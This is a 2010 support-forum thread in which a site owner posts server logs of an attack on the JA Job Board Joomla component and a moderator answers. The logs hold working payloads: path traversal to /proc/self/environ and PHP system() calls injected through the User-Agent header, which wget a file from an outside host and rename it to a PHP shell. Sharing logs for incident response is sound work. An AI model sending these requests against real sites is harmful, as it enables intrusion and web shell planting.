-
AuthorPosts
-
kutu Friend
kutu
- Join date:
- March 2010
- Posts:
- 60
- Downloads:
- 0
- Uploads:
- 8
- Thanks:
- 20
- Thanked:
- 1 times in 1 posts
May 24, 2010 at 1:10 pm #151286Newley i realized unusual fiels in my root folder. Their names are base.txt and n.txt
After i asked my hosting company and i receved this log files.74.7.241.42 – – [13/Apr/2010:22:34:32 +0300] “GET /index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1343 “-” “jcfs<?system(“lwp-download http://lnsshop.co .kr/n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:35:33 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1419 “-” “jcfs<?system(“id 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:59 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1368 “-” “jcfs<?system(“ls n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:38 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1763 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:43 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1767 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”So someone upload shell file to my root folder via jobboard then renamed n.txt file using ja jobboard? (as you see below)
74.7.241.42 – – [13/Apr/2010:22:37:18 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1362 “-” “jcfs<?system(“mv n.txt base.php 2> /dev/stdout”); ?>jcfs”
As a result this is enterprise paid component and how could be this kind of BUG?
Arvind Chauhan ModeratorArvind Chauhan
- Join date:
- September 2014
- Posts:
- 3835
- Downloads:
- 74
- Uploads:
- 92
- Thanks:
- 1240
- Thanked:
- 1334 times in 848 posts
kutu Friendkutu
- Join date:
- March 2010
- Posts:
- 60
- Downloads:
- 0
- Uploads:
- 8
- Thanks:
- 20
- Thanked:
- 1 times in 1 posts
May 24, 2010 at 7:32 pm #344567Do you want the all day logs that uploaded txt file? I just get this logs which are related to txt file from hosting company.
Would you describe exactly which log records?Anonymous ModeratorJA Developer
- Join date:
- September 2014
- Posts:
- 9914
- Downloads:
- 207
- Uploads:
- 152
- Thanks:
- 1789
- Thanked:
- 2008 times in 1700 posts
May 25, 2010 at 9:02 am #344648<em>@kutu 179797 wrote:</em><blockquote>Do you want the all day logs that uploaded txt file? I just get this logs which are related to txt file from hosting company.
Would you describe exactly which log records?</blockquote>Hi Kutu,
I would like to clarify that all the links in your log file are trying to steal account stored in server. Thus, your server should be configured to prevent outside form such an attack.
I already checked all the links and could see that JAJobboard have no error causing gaps in helping hacker make this during running component.
Kindly check and get back to us for any information.
-
AuthorPosts
This topic contains 4 replies, has 3 voices, and was last updated by Anonymous 14 years, 7 months ago.
We moved to new unified forum. Please post all new support queries in our New Forum